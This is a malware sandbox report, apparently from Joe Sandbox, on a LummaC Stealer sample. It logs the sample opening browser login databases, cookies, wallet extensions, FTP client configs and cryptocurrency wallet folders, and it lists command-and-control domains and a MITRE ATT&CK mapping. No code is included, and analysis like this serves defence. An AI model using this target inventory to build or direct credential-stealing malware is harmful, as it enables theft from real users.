Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	12 Process Injection	11 Masquerading	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	11 Input Capture	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	12 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	31 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	13 File and Directory Discovery	Distributed Component Object Model	1 Clipboard Data	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	25 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
CondosGold_nopump.exe	21%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\352348\Cassette.com	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	high
sputnik-1985.com	104.21.48.1	true	false	high
HkdhdnSyRbxIxwUiM.HkdhdnSyRbxIxwUiM	unknown	unknown	true	unknown
wordyfindy.lat	unknown	unknown	false	high
slipperyloo.lat	unknown	unknown	false	high
curverpluch.lat	unknown	unknown	false	high
tentabatte.lat	unknown	unknown	false	high
manyrestro.lat	unknown	unknown	false	high
bashfulacid.lat	unknown	unknown	false	high
brendon-sharjen.biz	unknown	unknown	false	high
shapestickyr.lat	unknown	unknown	false	high
talkynicer.lat	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/profiles/76561199724331900	false		high
https://sputnik-1985.com/api	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.autoitscript.com/autoit3/X	Cassette.com, 00000012.00000000.1328333947.00000000005C5000.00000002.00000001.01000000.00000008.sdmp, Meters.15.dr, Cassette.com.7.dr	false	high
http://nsis.sf.net/NSIS_ErrorError	CondosGold_nopump.exe	false	high
https://www.autoitscript.com/autoit3/	Casio.15.dr, Cassette.com.7.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.48.1	sputnik-1985.com	United States		13335	CLOUDFLARENETUS	false
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587443
Start date and time:	2025-01-10 11:40:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	CondosGold_nopump.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@24/23@12/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 27 Number of non-executed functions: 38
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

